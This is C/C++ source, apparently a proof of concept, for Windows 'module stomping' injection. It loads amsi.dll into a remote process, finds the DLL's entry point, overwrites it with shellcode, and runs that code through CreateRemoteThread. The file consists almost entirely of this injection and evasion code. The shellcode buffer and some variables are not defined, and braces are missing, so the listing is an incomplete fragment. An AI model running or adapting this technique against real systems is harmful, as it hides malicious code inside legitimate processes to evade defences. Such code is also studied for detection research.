int main(int argc, char* argv[])
TCHAR ModuleName[] = L"C:\\windows\\system32\\amsi.dll";
HMODULE hModules[256] = {};
SIZE_T hModulesSize = sizeof(hModules);
DWORD hModulesSizeNeeded = 0;
DWORD moduleNameSize = 0;
SIZE_T hModulesCount = 0;
CHAR rModuleName[128] = {};
// inject a benign DLL into remote process
//hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 2924);
LPVOID lprBuffer = VirtualAllocEx(hProcess, NULL, sizeof ModuleName, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, lprBuffer, (LPVOID)ModuleName, sizeof ModuleName, NULL);
PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
HANDLE dllThread = CreateRemoteThread(hProcess, NULL, 0, threadRoutine, lprBuffer, 0, NULL);
WaitForSingleObject(dllThread, 1000);
// find base address of the injected benign DLL in remote process
EnumProcessModules(hProcess, hModules, hModulesSize, &hModulesSizeNeeded);
hModulesCount = hModulesSizeNeeded / sizeof(HMODULE);
for (size_t i = 0; i < hModulesCount; i++)
GetModuleBaseNameA(hProcess, rModule, rModuleName, sizeof(rModuleName));
if (std::string(rModuleName).compare("amsi.dll") == 0)
// get DLL's AddressOfEntryPoint
DWORD headerBufferSize = 0x1000;
LPVOID peHeader = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);
ReadProcessMemory(hProcess, rModule, peHeader, headerBufferSize, NULL);
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)peHeader;
PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)peHeader + dosHeader->e_lfanew);
LPVOID dllEntryPoint = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)rModule);
// write shellcode to DLL's AddressofEntryPoint
WriteProcessMemory(hProcess, dllEntryPoint, (LPCVOID)shellcode, sizeof(shellcode), NULL);
// execute shellcode from inside the benign DLL
CreateRemoteThread(hProcess, NULL, 0, (PTHREAD_START_ROUTINE)dllEntryPoint, NULL, 0, NULL);